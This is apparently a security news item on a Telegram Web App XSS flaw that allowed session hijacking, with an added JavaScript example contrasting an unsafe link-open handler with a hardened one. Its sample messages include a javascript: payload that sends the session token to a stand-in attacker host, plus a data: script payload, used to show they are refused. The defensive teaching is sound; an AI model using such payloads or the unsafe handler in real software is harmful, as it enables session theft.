Hijack sessions with Telegram Web App vulnerability – be aware

April 29, 2024
1 min read

TLDR:

  • A vulnerability in Telegram Web App allows attackers to hijack user sessions
  • Telegram has patched the vulnerability in version 2.0.0 (488)

A newly disclosed vulnerability in Telegram's web client allows threat actors to hijack user sessions through cross-site scripting (XSS). It affects Telegram WebK versions below 2.0.0, and the Web App (mini-app) integration used by web3 services, so users of those services are exposed as well. The bug is triggered through the web_app_open_link event type: a malicious Web App can use it to run script in the context of the Telegram web client, save the victim's session ID and then reuse it to take over the session. Telegram patched the issue in version 2.0.0 (488) by adding code that blocks the exploit path. Users should update to the latest version. Note that upgrading the client does not revoke a session identifier that was already stolen, so anyone who may have opened an untrusted Web App should also review their active sessions in Telegram's device settings and terminate any they do not recognise.
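The advisory names the event type but not the code that was wrong. The block below is an added illustration written for this page, not Telegram's code and not the actual patch: it models a host page that receives link-open requests from an embedded Web App and shows the naive handler next to a hardened one. The message shape (a JSON string with eventType and eventData), the handler names, the openFn callback and the scheme allow-list are all assumptions chosen for the example; the one point it demonstrates is that a URL supplied by an embedded app is attacker-controlled data, and handing it to a navigation primitive without checking its scheme is script execution in the host's origin.

```javascript
// Added example: hardening a postMessage "open link" handler.
// Not Telegram's code. Message format, names and allow-list are assumptions.

// Only plain web navigation is allowed. javascript:, data:, blob: and
// friends are rejected because opening them runs in the host's origin.
const SAFE_SCHEMES = new Set(['http:', 'https:']);

// Naive handler: forwards whatever string the embedded app sent.
// If openFn is window.open or an anchor click, a payload such as
// { url: 'javascript:...' } executes in the host page (XSS).
function openLinkUnsafe(eventData, openFn) {
  return openFn(eventData.url);
}

// Hardened handler: validate shape, parse with the URL parser (no regex
// guessing), allow only http(s), and pass on the normalised href rather
// than the raw string. Returns a result object so callers can log refusals.
function openLinkSafe(eventData, openFn) {
  if (!eventData || typeof eventData.url !== 'string') {
    return { ok: false, reason: 'malformed' };
  }
  let parsed;
  try {
    parsed = new URL(eventData.url); // relative or garbage input throws here
  } catch {
    return { ok: false, reason: 'unparseable' };
  }
  if (!SAFE_SCHEMES.has(parsed.protocol)) {
    return { ok: false, reason: 'scheme:' + parsed.protocol };
  }
  openFn(parsed.href);
  return { ok: true, url: parsed.href };
}

// Dispatcher for a message from the Web App iframe. Origin checks do not
// help here: the embedded app is bot-controlled by design, so every field
// is untrusted and is validated before it reaches a privileged action.
function handleWebAppMessage(rawMessage, openFn) {
  let msg;
  try {
    msg = JSON.parse(rawMessage);
  } catch {
    return { ok: false, reason: 'not-json' };
  }
  if (!msg || msg.eventType !== 'web_app_open_link') {
    return { ok: false, reason: 'unhandled:' + (msg && msg.eventType) };
  }
  return openLinkSafe(msg.eventData, openFn);
}

// Constructed sample messages (not captured traffic) for a stand-alone run.
const SAMPLE_MESSAGES = [
  JSON.stringify({ eventType: 'web_app_open_link',
                   eventData: { url: 'https://example.com/docs' } }),
  JSON.stringify({ eventType: 'web_app_open_link',
                   eventData: { url: 'javascript:fetch("https://attacker.invalid/?s="+localStorage.getItem("session"))' } }),
  JSON.stringify({ eventType: 'web_app_open_link',
                   eventData: { url: 'data:text/html,<script>1</script>' } }),
  JSON.stringify({ eventType: 'web_app_open_link',
                   eventData: { url: '/relative/path' } }),
  JSON.stringify({ eventType: 'web_app_close', eventData: {} }),
];

// Runs every sample through the hardened dispatcher with a recording opener
// and returns what was opened plus the per-message verdicts.
function demo(messages = SAMPLE_MESSAGES) {
  const opened = [];
  const verdicts = messages.map((m) => handleWebAppMessage(m, (u) => opened.push(u)));
  return { opened, verdicts };
}

module.exports = { SAFE_SCHEMES, openLinkUnsafe, openLinkSafe, handleWebAppMessage, demo };
```

Running demo() opens only the https sample; the javascript: and data: payloads are refused with a scheme reason, the relative path is refused as unparseable, and the unrelated event type is ignored. The contrast with openLinkUnsafe, which would pass the javascript: string straight to the opener, is the whole bug class.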
